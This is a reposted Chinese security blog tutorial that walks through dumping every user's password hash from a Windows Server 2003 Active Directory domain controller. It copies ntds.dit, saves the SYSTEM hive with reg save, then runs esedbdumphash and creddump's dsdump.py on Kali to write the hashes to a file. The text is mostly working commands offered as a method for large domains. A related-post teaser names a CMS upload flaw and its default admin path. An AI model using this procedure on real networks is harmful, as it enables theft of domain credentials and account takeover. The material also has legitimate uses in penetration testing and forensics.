2003(32/64位)导出AD域控用户hash的终极方法

admin 2021年4月3日19:14:12评论31 views字数 850阅读2分50秒阅读模式

前言:by Metasploit上次写了一篇文章叫QuarksPwDum导出2003 AD域控所有用户hash的方法,这种方法只能导小型域控(几百用户的)。如果碰到几万甚至几十万用户的域控,用上面的方法就不行了,就会崩溃。那我们该怎么办呢?

正文:

一:

1,首先登陆域控提取ntds.dit,提取方法上篇文章有介绍。

2,然后提取注册表cmd>reg save hklmsystem system.hive

3, 把这两个文件下载到本地,然后放在虚拟机里面,我这里以kali为例演示(例虚拟机位置为/tmp/)

二:

进入kali虚拟机,然后下载文件ntds_dump_hash.zip (下载地址),解压安装。

#unzip ntds_dump_hash.zip
#cd libesedb
#./configure && make

修复数据库文件

#cd esedbtools
#./esedbdumphash -v -t /tmp/output /tmp/ntds.dit
#ls -1 /tmp/output.export/

导出数据库hash

#cd ../../creddump/
#chmod +x *.py
#./dsuserinfo.py /tmp/output.export/datatable
#./dsdump.py  /tmp/output.export/datatable -include-locked -include-disabled > /domain_hashes.txt

by Metasploit

转载请注明出处http://www.metasploit.cn/

[原文地址]

文章来源于lcx.cc:2003(32/64位)导出AD域控用户hash的终极方法

相关推荐: DodeCMS成创网站内容管理系统上传漏洞

    DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成;     访问模式采用动态模式,基本上实现了系统的自定义功能,代码简洁高效,易于修改维护,可扩展性强。     默认后台路径:admin/   …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:14:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2003(32/64位)导出AD域控用户hash的终极方法http://cn-sec.com/archives/320215.html

发表评论

匿名网友 填写信息